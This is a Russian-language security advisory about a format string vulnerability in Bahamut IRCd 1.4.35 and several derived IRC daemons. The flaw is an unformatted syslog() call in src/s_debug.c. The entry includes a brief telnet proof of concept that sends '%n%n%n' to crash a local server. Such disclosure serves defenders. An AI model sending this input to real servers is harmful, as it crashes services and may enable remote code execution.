Дата публикации: | 30.06.2003 |
Всего просмотров: | 1382 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость форматной строки обнаружена в Bahamut IRCd. Удаленный пользователь может выполнить произвольный код на целевой системе.
Уязвимость форматной строки обнаружена в 'src/s_debug.c' и может эксплуатироваться, если сервер конфигурирован с режимом DEBUGMODE. Программное обеспечение выполняет syslog() запрос, не определяя строку формата и не фильтруя пользовательские данные. Чтобы эксплуатировать уязвимость, удаленный пользователь может подключится к IRC серверу и послать специально обработанную строку формата: [je@vudo ~]$ telnet 127.0.0.1 6667 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. :server.dal.net NOTICE AUTH :*** Looking up your hostname... :server.dal.net NOTICE AUTH :*** Checking Ident :server.dal.net NOTICE AUTH :*** Found your hostname :server.dal.net NOTICE AUTH :*** No Ident response %n%n%n Connection closed by foreign host. [je@vudo ~]$ telnet 127.0.0.1 6667 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused [je@vudo ~]$Другие IRC демоны, основанные на Bahamut, также уязвимы - digatech-1.2.1, methane-0.1.1, и AndromedeIRCd1.2.3-Release. Уязвимость обнаружена в Bahamut IRCd 1.4.35 |
Ссылки: |
DoS эксплоит Bahamut IRCd <= 1.4.35 and several derived daemons |